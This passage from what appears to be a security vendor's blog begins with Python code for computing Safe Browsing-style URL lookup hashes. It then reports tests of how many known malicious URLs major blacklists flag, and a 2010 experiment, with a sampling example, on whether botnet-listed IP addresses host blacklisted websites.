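        segments = segments[:-1]          # drop the file name, keep directories only
    prefixes = ["/"] + ["/" + "/".join(segments[:i + 1]) + "/"
                        for i in range(min(len(segments), 3))]
    for prefix in prefixes:
        if prefix not in candidates:
            candidates.append(prefix)
    return candidates


def lookup_expressions(url):
    """All host/path combinations that must be hashed and checked for one URL."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    return [h + p for h in host_candidates(host) for p in path_candidates(path, parts.query)]


def lookup_hashes(url, prefix_bytes=4):
    """Map each expression to its full MD5 and the short prefix a v1 list carried."""
    result = {}
    for expr in lookup_expressions(url):
        digest = hashlib.md5(expr.encode()).hexdigest()
        result[expr] = (digest, digest[: prefix_bytes * 2])
    return result


if __name__ == "__main__":
    for expr, (full, prefix) in lookup_hashes("http://a.b.c/1/2.html?param=1").items():
        print(f"{expr:28} {prefix} {full}")
```

A list lookup is a hit on any one of these expressions, which is why a listing for a parent path or host also flags every page beneath it.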

Popular blacklists cover only a minuscule percentage of malicious sites.

Popular blacklists cover only a minuscule percentage of malicious sites.

Highlights

  • Google marked 0.18% of the URLs as unsafe.
  • Yahoo marked 1.0% of the URLs as unsafe.
  • Bing marked 0.09% of the URLs as unsafe.
  • Malware Patrol marked 0.63% of the URLs as unsafe.
  • Phishtank marked 0% of the URLs as unsafe.
  • WOT marked 99% of URLs as unsafe.

Note: 1095 unique, malicious URLs were tested with each service.

Observations

Interestingly, Web Of Trust (WOT) marked 99% of the URLs with a “poor”, “very poor” or “unsatisfactory” reputation. We assume that users who see such a rating will not visit the website in question, and so we treat this kind of rating as unsafe for the purposes of this test. It remains to be determined whether WOT uses a data feed from MalwareURL, which we used to prime the test set. Nonetheless, it is surprising to see that a company which specializes in collating the trust and opinions of web surfers performs orders of magnitude better than large Internet companies and established blacklist providers.

One must keep in mind, though, that Google’s approach to maintaining an ever-changing blacklist is slightly different from that of the other actors in the game. Google publishes an updated version of its list every 30 minutes or so and specifies which MD5 hashes need to be purged and which ones need to be inserted. Some blacklist services do not take this approach and hence may claim to store information on millions of sites which were infected at one point in time. The probability of this happening in the Google blacklist is low, because Google has opened up a review process via its Webmaster Central area through which its blacklist gets updated.

In contrast, Bing and Yahoo do not provide public APIs for developers and applications to use.

Also, we see that none of the URLs/domains were actually listed on Phishtank. It seems that websites which aim to infect users with malware are quite distinct from the set of sites used for phishing; malware-laced websites do not appear to be used to commit phishing as well.

Conclusion

Large Internet companies, some of whom have published effective blacklists used by many developers and applications all over the world, still have a long way to go to become truly effective. As we have seen, only a minuscule fraction of the malicious websites is identified by the blacklist services. WOT, on the other hand, seems to be extremely effective at identifying unsafe websites, although it remains to be determined whether the data set used for this test has a large overlap with any of the sources WOT uses to classify websites.

Another interesting result is that it does not seem that websites which aim to infect users with malware are actively involved in phishing campaigns.

Do Zombie IPs Host Blacklisted Websites?

January 12th, 2010

Zombie IPs can be defined as Internet addresses which participate in botnet communications. When Internet surfers visit websites contaminated with malware, the malicious code often succeeds in infecting the computer of the unsuspecting visitor. Once the malware has installed itself on the personal computer of the Internet surfer, it proceeds to receive commands from a “controller.” This controller machine is in many cases a chat group (IRC) or a more sophisticated system.

At StopTheHacker.com, we have tried to investigate whether there is a correlation between zombie IP addresses (botnet communication sources) and blacklisted websites. A strong correlation would point to a disturbing trend: servers used to host websites being infected at two levels, with the websites themselves infected and some kind of botnet malware hosted on those servers as well.

The Gumblar family of infections has targeted websites by installing malicious binaries on end-user clients and then sniffing for FTP credentials, which are used to inject malicious code into sites. This experiment provides a preliminary look into whether these kinds of malware are only targeting sites or are also creating botnets out of the infected machines.

Experiment Setup

We examined 178 CIDR IP address ranges obtained from SpamHaus. The entire IP address space covered 1,508,096 IP addresses. Out of these, a random sample of 1,600 IP addresses was chosen. Subsequently, we attempted to determine the websites hosted on each IP address and checked them against the Google Safebrowsing list. The experiment was conducted on January 11, 2010.
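The sampling step of the setup above, as an added example that is not the original experiment's code: it draws a fixed-size sample uniformly from the union of the CIDR ranges and then tallies how many sampled addresses host a site and how many of those sites appear in a blacklist. The CIDR ranges, hostnames and blacklist here are constructed placeholders, and the hostname lookup that a reverse-DNS pass would perform is supplied as a dictionary.

```python
import ipaddress
import random

def address_space(cidrs):
    """Parse CIDR ranges and return the networks plus the total number of
    addresses they cover (the post reports 1,508,096 for its 178 ranges)."""
    nets = [ipaddress.ip_network(c, strict=False) for c in cidrs]
    return nets, sum(n.num_addresses for n in nets)

def sample_addresses(nets, k, seed=0):
    """Draw k distinct addresses uniformly from the union of the ranges.
    Indexing into the concatenated space, instead of picking a range first,
    keeps large ranges from being under-represented in the sample."""
    total = sum(n.num_addresses for n in nets)
    picks = random.Random(seed).sample(range(total), k)
    chosen = []
    for idx in sorted(picks):
        for net in nets:
            if idx < net.num_addresses:
                chosen.append(str(net[idx]))
                break
            idx -= net.num_addresses
    return chosen

def correlate(sample, hosted_sites, blacklisted):
    """Tally how many sampled IPs host a website and how many of those sites are
    blacklisted. hosted_sites maps IP -> hostnames (what reverse DNS would
    return); blacklisted is the set of listed hostnames."""
    hosting = [ip for ip in sample if hosted_sites.get(ip)]
    listed = [ip for ip in hosting
              if any(h in blacklisted for h in hosted_sites[ip])]
    return {
        "sampled": len(sample),
        "hosting": len(hosting),
        "hosting_pct": round(100.0 * len(hosting) / len(sample), 2) if sample else 0.0,
        "listed": len(listed),
    }

if __name__ == "__main__":
    # constructed ranges and a constructed reverse-DNS map, standing in for the
    # SpamHaus ranges and the live lookups the experiment performed
    nets, total = address_space(["198.51.100.0/24", "203.0.113.0/25", "192.0.2.0/26"])
    sample = sample_addresses(nets, 40)
    hosted = {sample[0]: ["shop.example"], sample[1]: []}
    print(total, correlate(sample, hosted, {"shop.example"}))
```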

Experiment Summary

Results in brief:

  • The majority of zombie IPs do not seem to host any blacklisted websites.
  • Only 0.5% of the IPs seemed to host a website, and none of those websites were present in the Google blacklist.

This is an indicator that zombie IPs do not usually host blacklisted websites. It seems that the malware installs itself stealthily on end-clients and sniffs for FTP credentials, and does not really try to join the host machine to the botnet. This could be due to a concern that creating or joining a botnet increases the chances of the malware being detected on the host. However, given the robust and increasingly interconnected cycle of cyber-crime that proliferates across the Internet, this trend may change soon. We will be keeping a close eye on it, and expect to publish more results as a follow-up to this initial experiment.